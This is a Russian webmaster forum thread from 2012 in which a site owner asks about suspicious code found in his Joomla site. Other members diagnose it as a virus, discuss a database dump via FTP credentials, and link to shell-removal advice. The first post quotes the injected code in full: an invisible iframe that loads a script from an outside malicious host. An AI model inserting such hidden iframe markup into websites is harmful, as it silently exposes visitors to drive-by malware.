X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

Открыть тему
Тема закрыта
> Неизвестный код на сайте
dynz
dynz
Topic Starter сообщение 12.3.2012, 15:34; Ответить: dynz
Сообщение #1


Завсегдатай
*****

Группа: Active User
Сообщений: 588
Регистрация: 28.8.2010
Из: Мухосранск..
Поблагодарили: 157 раз
Репутация:   51  


Здравствуйте. Я дал заказ фрилансеру чтобы он исправил там некоторые баги в верстке и кое-что доверстал. Буквально сейчас на сайте обнаружил вот такой вот подозрительный код:
<iframe name="SagUTeXYne" src="http://freedom24.ru/templates/rhuk_milkyway/kx/index.php?out=1330961285" marginwidth="1" marginheight="0" title="DYvynEXUZe" border="0" width="1" frameborder="0" height="0" scrolling="no"></iframe>

Вопрос: что это за код? Вредоносный ли он? URL сайта: http://msosh.ru


--------------------
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
allsab
allsab
сообщение 12.3.2012, 15:42; Ответить: allsab
Сообщение #2


Завсегдатай
*****

Группа: Active User
Сообщений: 763
Регистрация: 13.4.2009
Поблагодарили: 208 раз
Репутация:   53  


Очень похоже на вирус.

Да и на сайт http://freedom24.ru/templates/rhuk_milkywa...?out=1330961285 антивирус не пускает, тревога...
Думаю ничего хорошего от этого ожидать не стоит.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
dynz
dynz
Topic Starter сообщение 12.3.2012, 15:54; Ответить: dynz
Сообщение #3


Завсегдатай
*****

Группа: Active User
Сообщений: 588
Регистрация: 28.8.2010
Из: Мухосранск..
Поблагодарили: 157 раз
Репутация:   51  


Уже удалил код, сменил FTP

Больше антивирусы не орут? Скажите можно имея доступ к FTP и доступ к админке joomla слить БД?

обнаружил на сайте mysqldumer. Удаляю. Он что БД слил получается?!


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
allsab
allsab
сообщение 12.3.2012, 16:06; Ответить: allsab
Сообщение #4


Завсегдатай
*****

Группа: Active User
Сообщений: 763
Регистрация: 13.4.2009
Поблагодарили: 208 раз
Репутация:   53  


Сейчас нормально.
Можно с ftp узнать данные для доступа к базе данных через config, а дальше и слить уже.
По joomla точно не знаю, в dle в админ. панели есть функция резервного копирования базы данных.
Но зачем mysqldumer непонятно, если можно сразу же на компьютер закачать


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Electric
Electric
сообщение 12.3.2012, 17:04; Ответить: Electric
Сообщение #5


CMS help/antivirus
******

Группа: Active User
Сообщений: 1532
Регистрация: 27.12.2009
Из: Єдина Україна
Поблагодарили: 389 раз
Репутация:   57  


(dynz @ 12.3.2012, 14:54) *
Он что БД слил получается?!
Скорее всего. Но может не успел.
Имея доступ к ФТП - можно получить доступ к БД.
Проверьте на наличие других гадостей на сайте (именно по ФТП), вот тут рекомендации по удлению возможніх вирусов и шеллов: http://www.maultalk.com/topic116023.html


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Rxp
Rxp
сообщение 12.3.2012, 17:22; Ответить: Rxp
Сообщение #6


Участник
***


Группа: User
Сообщений: 115
Регистрация: 9.11.2008
Поблагодарили: 21 раз
Репутация:   10  


Возможно у вас шелл залит, если повториться данная проблема стучите помогу удалить и вирусы и шеллы!


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Kuznec37
Kuznec37
сообщение 12.3.2012, 17:32; Ответить: Kuznec37
Сообщение #7


Старожил
******

Группа: Active User
Сообщений: 1134
Регистрация: 24.4.2008
Из: Кафа
Поблагодарили: 279 раз
Репутация:   32  


(dynz @ 12.3.2012, 12:54) *
обнаружил на сайте mysqldumer. Удаляю. Он что БД слил получается?!

Дампером намного быстрее сделать резервное копирование, на все про все, как правило, достаточно пары минут. Так что скорее всего вы уже опоздали.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
GreenMan
GreenMan
сообщение 12.3.2012, 17:58; Ответить: GreenMan
Сообщение #8


Бывалый
****

Группа: User
Сообщений: 444
Регистрация: 28.6.2011
Из: Home
Поблагодарили: 80 раз
Репутация:   12  


Да, фрилансер молодец, конечно...


--------------------
- вэбмастер-энтузиаст -
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
dynz
dynz
Topic Starter сообщение 12.3.2012, 18:00; Ответить: dynz
Сообщение #9


Завсегдатай
*****

Группа: Active User
Сообщений: 588
Регистрация: 28.8.2010
Из: Мухосранск..
Поблагодарили: 157 раз
Репутация:   51  


Фуф) слава тебе господи. Это не фрилансер вроде. Сайт да слит, но вроде для того чтобы сделать то что он должен на локалхосте. Это уже я тупанул. Ну то что кто-то изменил файл index.php и добавил туда вредоносный код остается фактом. Постараюсь узнать по логам. Тогда будет более понятно smile.gif
Rxp хорошо обязательно постучу.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Как правильно сделать категории на сайте?
Хелппп!!!
5 norino 619 Сегодня, 16:28
автор: One_on_One
Открытая тема (нет новых ответов) ALFAcoins.com - Приём криптовалюты на вашем сайте
16 ALFAcoins 3509 Вчера, 17:06
автор: ALFAcoins
Открытая тема (нет новых ответов) Размещу Вашу статью с ссылкой на сайте с Тиц 50 навсегда
11 vyacheslav333 1286 9.12.2017, 22:16
автор: Мамай
Открытая тема (нет новых ответов) 17 вещей на вашем сайте, которые ненавидят
Один из постулатов маркетинга — не раздражать людей
23 PostBrigada 3330 9.12.2017, 15:49
автор: Vmir
Открытая тема (нет новых ответов) Тема имеет прикрепленные файлыПрибыль с видео на сайте и в соц сетях
Как получить доп доход с нативного контента
13 maxim_krasovskiy 2663 4.12.2017, 17:09
автор: maxim_krasovskiy


 



RSS Текстовая версия Сейчас: 11.12.2017, 19:36
Дизайн